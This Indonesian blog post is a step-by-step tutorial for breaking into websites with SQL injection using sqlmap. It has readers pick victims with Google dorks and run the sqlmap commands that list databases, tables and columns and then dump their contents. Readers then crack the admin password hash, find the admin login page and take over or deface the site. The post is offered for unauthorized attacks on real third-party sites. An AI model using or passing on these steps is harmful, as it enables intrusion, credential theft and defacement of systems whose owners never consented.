Yap balik lagi dengan saya :'v
admin blog yang kece(bur sumur :v)
kali ini saya akan mengasih tutorial tentang Sql Injection With Sqlmap
tanpa basa basi langsung tancap gas mhank :'v
Bahan :
1. Komputer / Laptop
2. Koneksi Internet
3. Python2.7
4. Sqlmap
5. Admin Finder (gapake admin finder nebak juga bisa) | Disini (Under Maintance)
6. Google Dork => Disini | Pass : darkdevil |
Langkah langkah :
1. Buka Terminal
2. Install Python2.7 dahulu commandnya "sudo apt-get install python2.7"
3. Jika sudah download file Sqlmapnya Disini
4. Jika sudah silahkan extract file sqlmap tersebut
5. Lalu buka terminal
6. Ketikkan "cd Downloads/namafilesqlmap"
7. Mari kita cari target dengan Google Dork yang saya kasih
8. Jika sudah, ketikkan di Terminal "python sqlmap.py -u http://www.situs.co.li/index.php?id=69 --dbs"
9. Tunggu sampai keliatan list Database nya seperti ini
10. Lalu ketikkan "sqlmap.py -u http://TARGET.com -D nama_database -tables"
11. Kan ada tuh table databasenya kan ? coba ketikkan "sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns" untuk melihat columns dari tables tersebut
12. Nah sekarang ketikkan "sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump" untuk melihat isinya
13. Nah kan ada kan user|pass adminnya hehe :D ingat password admin biasanya harus di hash dulu agar bisa login di admin loginnya :)
14. Silahkan cari admin loginnya dari Admin Finder tersebut
15. Dan silahkan eksekusi sepuas klean
Note :
- Kalo mau nebas backup index orinya ya gan, jadi admin itu susah lo ya :D
- Maaf saya lagi gadapet target makanya ngambil ss orang :"v
sekian :D
0 comments:
Post a Comment